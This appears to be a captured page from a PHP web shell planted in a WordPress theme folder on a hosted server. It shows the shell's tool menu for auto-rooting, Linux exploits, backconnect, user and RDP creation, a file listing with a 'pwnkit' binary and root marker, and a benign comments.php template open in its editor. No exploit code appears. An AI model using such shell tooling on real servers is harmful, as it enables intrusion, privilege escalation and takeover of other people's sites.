Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
sento /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
licenses
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
182
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.14
KB
-rw-r--r--
comments.php
3.41
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
194
B
-rw-r--r--
content-search.php
706
B
-rw-r--r--
content-single.php
376
B
-rw-r--r--
content.php
801
B
-rw-r--r--
footer.php
980
B
-rw-r--r--
functions.php
11.18
KB
-rw-r--r--
functionsbak.php
10.69
KB
-rw-r--r--
header.php
3.1
KB
-rw-r--r--
image.php
2.99
KB
-rw-r--r--
index.php
111
B
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.05
KB
-rw-r--r--
page.php
410
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
13.77
KB
-rw-r--r--
screenshot.png
246.88
KB
-rw-r--r--
search.php
462
B
-rw-r--r--
searchform.php
473
B
-rw-r--r--
sidebar.php
873
B
-rw-r--r--
single.php
597
B
-rw-r--r--
style.css
141.11
KB
-rw-r--r--
template-sitemap.php
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying Comments. * * @package Sento */ ?> <?php /* Exit if the post is password protected & user is not logged in */ if ( post_password_required() ) return; ?> <div id="comments"> <div id="comments-core" class="comments-area"> <?php if ( have_comments() ) : ?> <div id="comments-title"> <h3> <?php printf( _n( '<span>1</span> Comments ', '<span>%1$s</span> Comments', get_comments_number(), 'sento' ), number_format_i18n( get_comments_number() ) ); ?> </h3> <span class="sep"><span class="sep-core"></span></span> </div> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav role="navigation" id="comment-nav-above" class="comment-navigation"> <div class="nav-previous"><?php previous_comments_link( __( 'Older Comments', 'sento' ) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments', 'sento' ) ); ?></div> </nav><!-- #comment-nav-before .comment-navigation --> <?php endif;?> <ol class="commentlist"> <?php /* List Comments */ thinkup_input_comments(); ?> </ol><!-- .commentlist --> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav role="navigation" id="comment-nav-below" class="comment-navigation"> <div class="nav-previous"><?php previous_comments_link( __( 'Older Comments', 'sento' ) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments', 'sento' ) ); ?></div> </nav><!-- #comment-nav-below .comment-navigation --> <?php endif; ?> <?php endif; ?> <?php /* Message to display when comments are closed */ if ( ! comments_open() && '0' != get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <div id="nocomments" class="notification info"> <div class="icon"><?php _e( 'Comments are closed.', 'sento' ); ?></div> </div> <?php endif; ?> <?php $req = get_option( 'require_name_email' ); $aria_req = ( $req ? " aria-required='true'" : '' ); $comments_args = array( 'label_submit' => __( 'Submit Now', 'sento' ), 'title_reply' => __( 'Leave Comment', 'sento' ), 'comment_notes_after' => '', 'comment_field' => '<p class="comment-form-comment">' . '<textarea id="comment" name="comment" placeholder="' . __( 'Your Message', 'sento' ) . '" cols="45" rows="8" aria-required="true">' . '</textarea></p>', 'fields' => apply_filters( 'comment_form_default_fields', array ( 'author' => '<p class="comment-form-author one_third">' . '<input id="author" name="author" placeholder="' . __( 'Your Name (Required)', 'sento' ) . '" type="text" value="' . esc_attr( $commenter['comment_author'] ) . '" size="30" /></p>', 'email' => '<p class="comment-form-email one_third">' . '<input id="email" name="email" placeholder="' . __( 'Your Email (Required)', 'sento' ) . '" type="text" value="' . esc_attr( $commenter['comment_author_email'] ) . '" size="30" /></p>', 'url' => '<p class="comment-form-url one_third last">' . '<input id="url" name="url" placeholder="' . __( 'Your Website', 'sento' ). '" type="text" value="' . esc_attr( $commenter['comment_author_url'] ) . '" size="30" /></p>' ) ), ); comment_form( $comments_args ); ?> </div> </div><div class="clearboth"></div><!-- #comments .comments-area -->
Close